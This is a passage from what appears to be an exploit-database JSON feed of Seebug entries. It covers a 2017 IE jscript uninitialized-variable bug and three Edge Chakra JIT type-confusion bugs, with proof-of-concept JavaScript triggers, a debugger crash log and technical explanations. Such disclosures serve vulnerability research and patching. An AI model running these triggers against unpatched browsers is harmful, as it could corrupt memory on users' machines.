URIError(new Array(), undefined, undefined);\r\nString.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));\r\nArray.prototype.slice.call(1);\r\n</script>\r\n```\r\n\r\n### Technical details:\r\n\r\nThe issue is in jscript!JsArraySlice (Array.prototype.slice.call in the PoC above, all other lines are just fuzzer generated junk that puts the stack into a 'correct' state needed to demonstrate the issue).\r\n\r\nJsArraySlice looks approximately like:\r\n```\r\nint JsArraySlice(CSession *session, VAR *this, VAR *ret, int num_args, VAR *args) {\r\n VAR object;\r\n VAR length;\r\n NameTbl *nametable;\r\n\r\n if(!ConvertToObject(session, this, &object, 0)) {\r\n //set error and return\r\n }\r\n if(!IsJSObject(&object, &nametable)) {\r\n //set error and return\r\n }\r\n if(nametable->GetVal(&g_sym_length, &length) < 0) {\r\n //set error and return \r\n }\r\n if(length->type != TYPE_INT) {\r\n ConvertToScalar(session, &length, &length, 3, 1);\r\n }\r\n\r\n ...\r\n\r\n}\r\n```\r\nThe issue is that JsArraySlice() expects NameTBL::GetVal() to return an integer <0 if the input object does not contain the 'length' property. However in this case NameTBL::GetVal() will actually return 1. Also, in this case, the length VAR is *not* going to be initialized. Thus if NameTBL::GetVal() returns 1, ConvertToScalar() is going to be called with invalid arguments. Depending on the perceived (uninitialized) type of length VAR, this might lead to exploitable conditions including calling a virtual method on the uninitialized pointer (see below).\r\n\r\n### Debug log:\r\n```\r\n(a3c.bd8): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\njscript!InvokeDispatch+0xbd:\r\n00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????\r\n\r\n0:014> r\r\nrax=0000004e0061004e rbx=000000f42f0fb400 rcx=00007ffae4630904\r\nrdx=0000000000000081 rsi=0000000000000002 rdi=00007ffae4630904\r\nrip=00007ffae45a45fd rsp=000000f42f0fb1e0 rbp=000000f42f0fb2e0\r\n r8=000000f42f0fb230 r9=000000f42f0fb2a0 r10=0000000000000080\r\nr11=5555555511140000 r12=0000000000000000 r13=0000000000000000\r\nr14=000002a7533c5a70 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\njscript!InvokeDispatch+0xbd:\r\n00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????\r\n\r\n0:014> k\r\n # Child-SP RetAddr Call Site\r\n00 000000f4`2f0fb1e0 00007ffa`e45b548f jscript!InvokeDispatch+0xbd\r\n01 000000f4`2f0fb380 00007ffa`e45adc2d jscript!AutBlock::AddRef+0x101f\r\n02 000000f4`2f0fb3d0 00007ffa`e45e048f jscript!ConvertToScalar+0x51\r\n03 000000f4`2f0fb440 00007ffa`e458265a jscript!JsArraySlice+0x10f\r\n04 000000f4`2f0fb540 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a\r\n05 000000f4`2f0fb5f0 00007ffa`e458d75b jscript!NameTbl::InvokeInternal+0x135\r\n06 000000f4`2f0fb6b0 00007ffa`e45d4d80 jscript!VAR::InvokeByDispID+0x87\r\n07 000000f4`2f0fb700 00007ffa`e458265a jscript!JsFncCall+0xb0\r\n08 000000f4`2f0fb780 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a\r\n09 000000f4`2f0fb830 00007ffa`e458cce0 jscript!NameTbl::InvokeInternal+0x135\r\n0a 000000f4`2f0fb8f0 00007ffa`e45a7f18 jscript!VAR::InvokeByName+0x580\r\n0b 000000f4`2f0fbaf0 00007ffa`e45b562b jscript!VAR::InvokeDispName+0x60\r\n0c 000000f4`2f0fbb70 00007ffa`e4594ccf jscript!AutBlock::AddRef+0x11bb\r\n0d 000000f4`2f0fbbc0 00007ffa`e45972cd jscript!CScriptRuntime::Run+0x665f\r\n0e 000000f4`2f0fc520 00007ffa`e4597428 jscript!ScrFncObj::CallWithFrameOnStack+0x15d\r\n0f 000000f4`2f0fc720 00007ffa`e4588b15 jscript!ScrFncObj::Call+0xb8\r\n10 000000f4`2f0fc7c0 00007ffa`e45861eb jscript!CSession::Execute+0x265\r\n11 000000f4`2f0fc920 00007ffa`e4586929 jscript!COleScript::ExecutePendingScripts+0x28b\r\n12 000000f4`2f0fca00 00007ffa`e4586a06 jscript!COleScript::ParseScriptTextCore+0x239\r\n13 000000f4`2f0fcaf0 00007ffa`ae439138 jscript!COleScript::ParseScriptText+0x56\r\n14 000000f4`2f0fcb50 00007ffa`ae4f8f7d MSHTML!CActiveScriptHolder::ParseScriptText+0xb8\r\n15 000000f4`2f0fcbd0 00007ffa`ae4f827c MSHTML!CScriptCollection::ParseScriptText+0x26d\r\n16 000000f4`2f0fccb0 00007ffa`ae465a63 MSHTML!CScriptData::CommitCode+0x3b4\r\n17 000000f4`2f0fce80 00007ffa`ae4657df MSHTML!CScriptData::Execute+0x267\r\n18 000000f4`2f0fcf40 00007ffa`ae357ea1 MSHTML!CHtmScriptParseCtx::Execute+0xbf\r\n19 000000f4`2f0fcf70 00007ffa`ae3b8880 MSHTML!CHtmParseBase::Execute+0x181\r\n1a 000000f4`2f0fd000 00007ffa`ae3b846a MSHTML!CHtmPost::Broadcast+0x50\r\n1b 000000f4`2f0fd040 00007ffa`ae467fae MSHTML!CHtmPost::Exec+0x39a\r\n1c 000000f4`2f0fd240 00007ffa`ae469324 MSHTML!CHtmPost::Run+0x32\r\n1d 000000f4`2f0fd270 00007ffa`ae463b99 MSHTML!PostManExecute+0x70\r\n1e 000000f4`2f0fd2f0 00007ffa`ae463a60 MSHTML!PostManResume+0xa1\r\n1f 000000f4`2f0fd330 00007ffa`ae44523c MSHTML!CHtmPost::OnDwnChanCallback+0x40\r\n20 000000f4`2f0fd380 00007ffa`ae386e21 MSHTML!CDwnChan::OnMethodCall+0x1c\r\n21 000000f4`2f0fd3b0 00007ffa`ae3adcb9 MSHTML!GlobalWndOnMethodCall+0x251\r\n22 000000f4`2f0fd460 00007ffa`f1f61c24 MSHTML!GlobalWndProc+0xf9\r\n23 000000f4`2f0fd4f0 00007ffa`f1f6156c USER32!UserCallWinProcCheckWow+0x274\r\n24 000000f4`2f0fd650 00007ffa`afa629f7 USER32!DispatchMessageWorker+0x1ac\r\n25 000000f4`2f0fd6d0 00007ffa`afa9ed04 IEFRAME!CTabWindow::_TabWindowThreadProc+0x5e7\r\n26 000000f4`2f0ff920 00007ffa`e42c9586 IEFRAME!LCIETab_ThreadProc+0x3a4\r\n27 000000f4`2f0ffa50 00007ffa`c8b92ed9 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16\r\n28 000000f4`2f0ffa80 00007ffa`f2268364 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x89\r\n29 000000f4`2f0ffad0 00007ffa`f43e7091 KERNEL32!BaseThreadInitThunk+0x14\r\n2a 000000f4`2f0ffb00 00000000`00000000 ntdll!RtlUserThreadStart+0x21\r\n\r\n0:014> u rip\r\njscript!InvokeDispatch+0xbd:\r\n00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8]\r\n00007ffa`e45a4601 ff15c14d0700 call qword ptr [jscript!_guard_dispatch_icall_fptr (00007ffa`e46193c8)]\r\n00007ffa`e45a4607 488d442458 lea rax,[rsp+58h]\r\n00007ffa`e45a460c 458bc4 mov r8d,r12d\r\n00007ffa`e45a460f 4889442448 mov qword ptr [rsp+48h],rax\r\n00007ffa`e45a4614 488bd7 mov rdx,rdi\r\n00007ffa`e45a4617 488d4580 lea rax,[rbp-80h]\r\n00007ffa`e45a461b 498bce mov rcx,r14\r\n```", "published": "2017-12-20T00:00:00", "type": "seebug", "title": "Windows: Uninitialized variable in jscript!JsArraySlice(CVE-2017-11855)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11855"], "modified": "2017-12-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-97006", "id": "SSV:97006", "sourceData": "\n <!-- saved from url=(0014)about:internet -->\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n<script language=\"Jscript.Encode\">\r\nvar x = new URIError(new Array(), undefined, undefined);\r\nString.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));\r\nArray.prototype.slice.call(1);\r\n</script>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-97006", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-25T18:27:42", "description": "In the following JavaScript code, both of the print calls must print out \"undefined\" because of \"x\" is a formal parameter. But the second print call prints out \"function x() { }\". This bug may lead to type confusion in JITed code.\r\n```\r\nfunction f(x) {\r\n print(x);\r\n\r\n {\r\n function x() {\r\n\r\n }\r\n }\r\n\r\n print(x);\r\n}\r\n```\r\nThe following code in \"PreVisitFunction\" is used to decide how to optimize arguments.\r\n```\r\n bool doStackArgsOpt = (!pnode->sxFnc.HasAnyWriteToFormals() || funcInfo->GetIsStrictMode());\r\n```\r\n\r\n\"HasAnyWriteToFormals\" set by \"Parser::BindPidRefsInScope\" returns true in the following example code where \"x\" is formal. But the method can't detect the above buggy case, so it may end up wrongly optimizing arguments.\r\n```\r\nfunction f(x) {\r\n x = 1;\r\n}\r\n```", "published": "2017-12-04T00:00:00", "type": "seebug", "title": "Microsoft Edge: Chakra: JIT: Incorrect function declaration scope(CVE-2017-11870)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11870"], "modified": "2017-12-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96917", "id": "SSV:96917", "sourceData": "\n function f(x) {\r\n arguments;\r\n\r\n {\r\n function x() {\r\n }\r\n }\r\n}\r\n\r\nfor (let i = 0; i < 10000; i++)\r\n f();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96917", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:56:51", "description": "```\r\nfunction opt(a, b, v) {\r\n if (b.length < 1)\r\n return;\r\n\r\n for (let i = 0; i < a.length; i++)\r\n a[i] = v;\r\n\r\n b[0] = 2.3023e-320;\r\n}\r\n```\r\nThe above JavaScript code is JITed as follows:\r\n```\r\n... CHECKING THE TYPE OF B ...\r\nOP_Memset(a, v, a.length);\r\nb[0] = 2.3023e-320;\r\n```\r\nBut there's no ImplicitCallFlags checks around OP_Memset. So it fails to detect if the type of \"b\" was changed after the \"OP_Memset\" called.\r\n\r\nThe PoC shows that it can result in type confusion.", "published": "2017-11-16T00:00:00", "type": "seebug", "title": "Microsoft Edge: Chakra: JIT: Bailouts must be generated for OP_Memset(CVE-2017-11873)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11873"], "modified": "2017-11-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96872", "id": "SSV:96872", "sourceData": "\n function opt(a, b, v) {\r\n if (b.length < 1)\r\n return;\r\n\r\n for (let i = 0; i < a.length; i++)\r\n a[i] = v;\r\n\r\n b[0] = 2.3023e-320;\r\n}\r\n\r\nfunction main() {\r\n for (let i = 0; i < 1000; i++) {\r\n opt(new Uint8Array(100), [1.1, 2.2, 3.3], {});\r\n }\r\n\r\n let a = new Uint8Array(100);\r\n let b = [1.1, 2.2, 3.3];\r\n opt(a, b, {\r\n valueOf: () => {\r\n b[0] = {};\r\n return 0;\r\n }\r\n });\r\n\r\n print(b[0]);\r\n}\r\n\r\nmain();\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96872", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:57:28", "description": "Here's a snippet of the method.\r\n```\r\nvoid Lowerer::LowerBoundCheck(IR::Instr *const instr)\r\n{\r\n ...\r\n if(rightOpnd->IsIntConstOpnd())\r\n {\r\n IntConstType newOffset;\r\n if(!IntConstMath::Add(offset, rightOpnd->AsIntConstOpnd()->GetValue(), &newOffset)) <<--- (a)\r\n {\r\n offset = newOffset;\r\n rightOpnd = nullptr;\r\n offsetOpnd = nullptr;\r\n }\r\n }\r\n ...\r\n if(!rightOpnd)\r\n {\r\n rightOpnd = IR::IntConstOpnd::New(offset, TyInt32, func);\r\n }\r\n}\r\n```\r\nAt (a), it uses \"IntConstMath::Add\" to check integer overflow. But the size of IntConstType equals to the size of pointer, and the \"offset\" variable is used as a 32-bit integer. So it may fail to check integer overflow on 64-bit system.", "published": "2017-11-16T00:00:00", "type": "seebug", "title": "Microsoft Edge: Chakra: JIT: Incorrect integer overflow check in Lowerer::LowerBoundCheck(CVE-2017-11861)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11861"], "modified": "2017-11-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96873", "id": "SSV:96873", "sourceData": "\n function f() {\r\n let arr = new Uint32Array(0x1000);\r\n for (let i = 0; i < 0x7fffffff;) {\r\n arr[++i] = 0x1234;\r\n }\r\n}\r\n\r\nf();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96873", "cvss": {"score": 0.0, "vector": "NONE"}}]}